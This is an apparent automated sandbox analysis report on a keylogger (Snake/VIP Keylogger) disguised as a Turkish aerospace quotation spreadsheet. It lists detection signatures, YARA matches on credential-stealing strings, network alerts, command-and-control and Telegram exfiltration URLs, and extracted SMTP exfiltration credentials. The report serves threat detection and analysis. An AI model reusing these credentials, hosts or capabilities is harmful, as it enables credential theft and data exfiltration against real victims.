Edit tour

Windows Analysis Report
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Overview

General Information

Sample name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe renamed because original name is a hash value
Original sample name:	TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Analysis ID:	1576573
MD5:	711d0893a047d1aaabd5cb4c1fd8f4ad
SHA1:	e555d7e2ec5f631e9317b62d004ff4069a4b20e2
SHA256:	8b0966ac0b9d10efd2de59fd1f3949c0c5fd24a293193396022d949cecb8ef7d
Tags:	exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Found API chain indicative of sandbox detection

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe (PID: 7876 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: 711D0893A047D1AAABD5CB4C1FD8F4AD)

RegSvcs.exe (PID: 7960 cmdline: "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "royals@htcp.homes", "Password": "7213575aceACE@@", "Host": "mail.htcp.homes", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data
00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.2658183432.000000000290B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 7876	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x46f580:$a1: get_encryptedPassword 0x46fafe:$a2: get_encryptedUsername 0x46f202:$a3: get_timePasswordChanged 0x46f319:$a4: get_passwordField 0x46f596:$a5: set_encryptedPassword 0x47225a:$a6: get_passwords 0x4725ea:$a7: get_logins 0x472246:$a8: GetOutlookPasswords 0x471bff:$a9: StartKeylogger 0x472543:$a10: KeyLoggerEventArgs 0x471c9f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7960	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7960	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 7960	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 7960	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xecb1a:$a1: get_encryptedPassword 0xed098:$a2: get_encryptedUsername 0xec79c:$a3: get_timePasswordChanged 0xec8b3:$a4: get_passwordField 0xecb30:$a5: set_encryptedPassword 0xef7f4:$a6: get_passwords 0xefb84:$a7: get_logins 0xef7e0:$a8: GetOutlookPasswords 0xef199:$a9: StartKeylogger 0xefadd:$a10: KeyLoggerEventArgs 0xef239:$a11: KeyLoggerEventArgsEventHandler
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.350000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.350000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.350000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.RegSvcs.exe.350000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.RegSvcs.exe.350000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
2.2.RegSvcs.exe.350000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b28e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a931:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab8e:$a4: \Orbitum\User Data\Default\Login Data 0x3b56d:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.350000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3948e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b31:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d8e:$a4: \Orbitum\User Data\Default\Login Data 0x3976d:$a5: \Kometa\User Data\Default\Login Data
0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
Click to see the 15 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T09:41:29.137035+0100	2803305	3	Unknown Traffic	192.168.2.8	49708	104.21.67.152	443	TCP
2024-12-17T09:41:32.141927+0100	2803305	3	Unknown Traffic	192.168.2.8	49710	104.21.67.152	443	TCP
2024-12-17T09:41:38.351911+0100	2803305	3	Unknown Traffic	192.168.2.8	49716	104.21.67.152	443	TCP
2024-12-17T09:41:44.336851+0100	2803305	3	Unknown Traffic	192.168.2.8	49720	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T09:41:25.108285+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	158.101.44.242	80	TCP
2024-12-17T09:41:27.514527+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49706	158.101.44.242	80	TCP
2024-12-17T09:41:30.530148+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	158.101.44.242	80	TCP
2024-12-17T09:41:33.514607+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49711	158.101.44.242	80	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 17 Dec 2024 08:41:52 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002801000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enpv
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1456636378.0000000004020000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2656573974.0000000000352000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.2658183432.000000000287B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000028C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000002.00000002.2659895597.0000000003821000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: RegSvcs.exe, 00000002.00000002.2658183432.00000000029E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/pv

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.4020000.1.raw.unpack, COVID19.cs

.Net Code: VKCodeToUnicode

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Code function: 0_2_001FEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_001FEAFF

